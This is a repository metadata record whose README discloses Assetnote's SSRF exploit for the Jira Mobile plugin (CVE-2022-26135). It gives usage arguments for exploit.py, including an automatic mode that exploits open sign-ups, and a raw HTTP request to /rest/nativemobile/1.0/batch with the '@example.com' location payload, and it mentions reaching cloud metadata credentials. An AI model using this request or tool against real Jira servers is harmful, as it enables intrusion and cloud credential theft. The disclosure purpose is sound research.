{"id":19324489,"url":"https://github.com/assetnote/jira-mobile-ssrf-exploit","last_synced_at":"2026-02-24T07:17:08.787Z","repository":{"id":42645373,"uuid":"506925900","full_name":"assetnote/jira-mobile-ssrf-exploit","owner":"assetnote","description":"Exploit code for Jira Mobile Rest Plugin SSRF (CVE-2022-26135)","archived":false,"fork":false,"pushed_at":"2022-07-05T21:13:44.000Z","size":11,"stargazers_count":87,"open_issues_count":0,"forks_count":18,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-04-02T03:43:11.697Z","etag":null,"topics":["cve-2022-26135","exploit","jira","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/assetnote.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-06-24T07:55:52.000Z","updated_at":"2024-10-03T05:16:25.000Z","dependencies_parsed_at":"2022-09-24T07:01:35.128Z","dependency_job_id":null,"html_url":"https://github.com/assetnote/jira-mobile-ssrf-exploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/assetnote%2Fjira-mobile-ssrf-exploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/assetnote%2Fjira-mobile-ssrf-exploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/assetnote%2Fjira-mobile-ssrf-exploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/assetnote%2Fjira-mobile-ssrf-exploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/assetnote","download_url":"https://codeload.github.com/assetnote/jira-mobile-ssrf-exploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250308659,"owners_count":21409314,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2022-26135","exploit","jira","ssrf"],"created_at":"2024-11-10T02:05:35.649Z","updated_at":"2026-02-24T07:17:08.708Z","avatar_url":"https://github.com/assetnote.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2022-26135 - Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server\n\n## About Assetnote\n\nAssetnote automatically maps your external assets and monitors them for changes and security issues to help prevent serious breaches.\n\nThis research was performed by Assetnote's Security Research team.\n\nYou can read more about our product and our team at [https://assetnote.io](https://assetnote.io).\n\n## Blog Post\n\nThe blog post detailing the steps taken for the discovery of this vulnerability can be found [here](https://blog.assetnote.io/2022/06/26/exploiting-ssrf-in-jira/).\n\n## Description\n\nJira Core \u0026 Jira Service Desk are vulnerable to server-side request forgery after authenticating. In some cases, it is possible to leverage open sign ups in Jira Core or Jira Service Desk to exploit this server-side request forgery flaw without having known credentials.\n\n## Impact\n\nThe SSRF vulnerability allows attackers to send HTTP requests using any HTTP method, headers and body to arbitrary URLs. When Jira is deployed on a cloud environment, an attacker can leverage this exploit chain to obtain cloud credentials or other sensitive information through the metadata IP address.\n\n## Affected Software\n\nAs per the advisory from Atlassian, please see the following knowledge base article to confirm if you are running an affected software version: [https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html](https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html)\n\n# Usage Instructions\n\n```\npip3 install -r requirements.txt\n```\n\nand then you can use the exploit using:\n\n```\npython3 exploit.py\n```\n\nHelp:\n\n```\nusage: exploit.py [-h] --target TARGET --ssrf SSRF --mode MODE [--software SOFTWARE] [--username USERNAME] [--email EMAIL] [--password PASSWORD]\n\noptional arguments:\n  -h, --help           show this help message and exit\n  --target TARGET      i.e. http://re.local:8090\n  --ssrf SSRF          i.e. example.com (no protocol pls)\n  --mode MODE          i.e. manual or automatic - manual mode you need to provide user auth info\n  --software SOFTWARE  i.e. jira or jsd - only needed for manual mode\n  --username USERNAME  i.e. admin - only needed for manual jira mode\n  --email EMAIL        i.e. admin@example.com - only needed for manual jira service desk mode\n  --password PASSWORD  i.e. testing123 - only needed for manual mode\n```\n\nIf you already have credentials for Jira / Jira Service Desk, then set the `--mode` to `manual` and the `--software` argument to either `jira` or `jsd`.\n\n# HTTP Request\n\nThe following HTTP request can be used to reproduce this issue, once authenticated to the Jira instance:\n\n```http\nPOST /rest/nativemobile/1.0/batch HTTP/2\nHost: issues.example.com\nCookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nOrigin: https://issues.example.com\nReferer: https://issues.example.com/plugins/servlet/desk\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nContent-Length: 63\n\n{\"requests\":[{\"method\":\"GET\",\"location\":\"@example.com\"}]}\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fassetnote%2Fjira-mobile-ssrf-exploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fassetnote%2Fjira-mobile-ssrf-exploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fassetnote%2Fjira-mobile-ssrf-exploit/lists"}